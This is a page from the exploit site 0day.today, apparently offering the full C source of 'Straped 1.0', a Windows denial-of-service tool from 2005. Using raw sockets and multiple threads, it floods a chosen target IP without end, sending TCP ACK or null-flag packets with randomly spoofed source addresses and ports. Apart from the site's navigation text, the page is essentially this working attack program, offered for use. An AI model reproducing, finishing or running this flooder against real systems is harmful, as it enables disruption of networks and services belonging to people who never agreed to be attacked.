0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Stream / Raped Denial of Service Attack (win version)
[=====================================================
Stream / Raped Denial of Service Attack (win version)
=====================================================
/**
Straped 1.0 author: Marco Del Percio 20/05/2005
Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for info about this.
levante at manicomio.org
*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>
#pragma comment(lib, "ws2_32")
/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;
/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};
/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))
void flood(void *id); /* Thread flood function */
/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}
int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;
if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null> <number of threads>\n",argv[0]);
exit(1);
}
if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010;
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000;
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or \"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);
/* The ID of each thread is the only argument passed to the thread function (as a void *) */
_beginthread( flood, 0, (void *) i);
}
Sleep(100);
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);
return 0;
}
void flood(void *id) {
SOCKET sock;
int delay = 1;
unsigned char packet[4096];
struct sockaddr_in sin;
unsigned short pseudo[32], seg_length = 20;
unsigned char one,two,three,four, *ptr;
unsigned char spoofed_address[7];
struct ip_hdr *ip = (struct ip_hdr *) packet;
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);
WaitForSingleObject(TIARRAY[(int)id], INFINITE);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {
fprintf(stderr, "\nThread with ID %d was unable to open socket\n", (int)id);
_endthread();
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); //this will be changed with a random port
sin.sin_addr.s_addr = target;
memset(packet, 0, 4096);
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = htons(TOTAL_LEN);
ip->ip_id = htons((USHORT)rand());
ip->ip_off = 0;
ip->ip_ttl = 128;
ip->ip_p = 6;
ip->ip_sum = 0;
ip->ip_src = target;
ip->ip_dst = sin.sin_addr.s_addr;
tcp->th_sport = htons((USHORT)rand()); /* Random source/destination port */
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(0);
tcp->th_x2 = 0;
tcp->th_off = 5;
tcp->th_flags = attackType; /* either ack or no flags set */
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
ptr = (unsigned char *)pseudo;
/* These passages were NOT coded by me. They're from Sahir Hidayatullah. These statements are based on hard coded offsets of the various fields from the start of the datagram */
memset(pseudo,0,32); // Zero out the pseudo-header
memcpy(ptr,packet+20,20); // Copy in the tcp header
memcpy((ptr+20),packet+12,4); // Source IP
memcpy((ptr+24),packet+16,4); // Dest IP
memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
while(1){
/* Each cycle generate a random source IP address, a random source/destination port, a random sequence number and a random IP id
then recalculate checksum both for IP and TCP and finally sends out the packet */
ptr = NULL;
sin.sin_port = htons((USHORT)rand());
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;
sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four);
ip->ip_src = inet_addr(spoofed_address);
ip->ip_id = htons((USHORT)rand());
ip->ip_sum = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
tcp->th_sport = htons((USHORT)rand());
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_sum=0;
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20);
memcpy((ptr+20),packet+12,4);
memcpy((ptr+24),packet+16,4);
memcpy((ptr+29),packet+9,1);
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);
/* Sends out the datagram. 40 bytes is the sum of IP and TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin, sizeof(sin)) < 0)
printf ("Thread with ID %d. Error while sending the packet: %d\n", (int)id, WSAGetLastError());
if(delay)
Sleep(delay);
}
}
# 0day.today [2024-11-16] #